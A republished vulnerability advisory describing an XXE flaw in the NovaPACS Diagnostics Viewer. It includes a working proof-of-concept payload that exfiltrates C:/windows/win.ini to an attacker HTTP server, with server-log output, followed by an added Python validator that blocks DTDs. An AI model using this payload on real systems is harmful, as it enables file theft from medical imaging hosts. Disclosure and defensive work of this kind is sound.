TheHackerWorld Official

NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)

# Title: NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-09-07
# Vendor: NovaRad Corporation
# Product web page: https://www.novarad.net
# Affected version: 8.5.19.75 (Diagnostics Viewer, Study Browser)
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Advisory ID: ZSL-2018-5488
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5488.php
# CVE: N/A

# Desc: NovaPACS suffers from an unauthenticated XML External Entity
# (XXE) injection vulnerability using the DTD parameter entities technique
# resulting in disclosure and retrieval of arbitrary data from the affected
# node via out-of-band (OOB) channel attack. The vulnerability is triggered
# when importing XML format preferences within the settings submenu.

# PoC
# Malicious.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ZSL [
<!ENTITY % remote SYSTEM "http://10.0.1.230:8080/xxe.xml">
%remote;
%root;
%oob;]>

# Attacker's xxe.xml:

<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://10.0.1.230:8080/?%payload;'> ">

# Data retrieval:

lqwrm@metalgear:~$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.0.1.230 - - [28/Aug/2018 16:27:48] "GET /xxe.xml HTTP/1.1" 200 -
10.0.1.230 - - [28/Aug/2018 16:27:48] "GET /?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1%0D%0A[MCI%20Extensions.BAK]%0D%0A3g2=MPEGVideo%0D%0A3gp=MPEGVideo%0D%0A3gp2=MPEGVideo%0D%0A3gpp=MPEGVideo%0D%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo%0D%0Amod=MPEGVideo%0D%0Amov=MPEGVideo%0D%0Amp4=MPEGVideo%0D%0Amp4v=MPEGVideo%0D%0Amts=MPEGVideo%0D%0Ats=MPEGVideo%0D%0Atts=MPEGVideo%0D%0A[FIX%20DMACS]%0D%0AMinAfterStartup=0 HTTP/1.1" 200 -
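
A defensive check for the XML preferences import described above, as an added example that is not part of the original advisory or the vendor's code: it rejects any imported file that carries a DOCTYPE or entity declaration before the content reaches the application's own parser. The function names and the benign sample's element names are assumptions made for illustration.

```python
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """The imported file declares a DTD or entities."""


def _reject(kind):
    # Build an expat handler that aborts parsing as soon as it is called.
    def handler(*args):
        raise ForbiddenXML(f"{kind} not allowed in imported preferences")
    return handler


def validate_import(data: bytes):
    """Return (ok, reason) for an XML preferences file.

    expat does not fetch external identifiers on its own, and the handlers
    below abort on the first DOCTYPE or ENTITY construct, so nothing is
    resolved over the network or from the local file system.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _reject("DOCTYPE declaration")
    parser.EntityDeclHandler = _reject("entity declaration")
    parser.ExternalEntityRefHandler = _reject("external entity reference")
    try:
        parser.Parse(data, True)
    except ForbiddenXML as exc:
        return False, str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"
    return True, "ok"


# Malicious.xml exactly as shown in the advisory above.
MALICIOUS = b"""<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ZSL [
<!ENTITY % remote SYSTEM "http://10.0.1.230:8080/xxe.xml">
%remote;
%root;
%oob;]>
"""

# Constructed benign preferences file (element names are hypothetical).
BENIGN = b"""<?xml version="1.0" encoding="UTF-8" ?>
<Preferences><Viewer layout="2x2"/></Preferences>
"""

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, validate_import(doc))
```

A preferences format has no need for a DTD, so refusing every DOCTYPE is stricter than disabling only external entities and also covers the parameter-entity technique used in the PoC.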
            
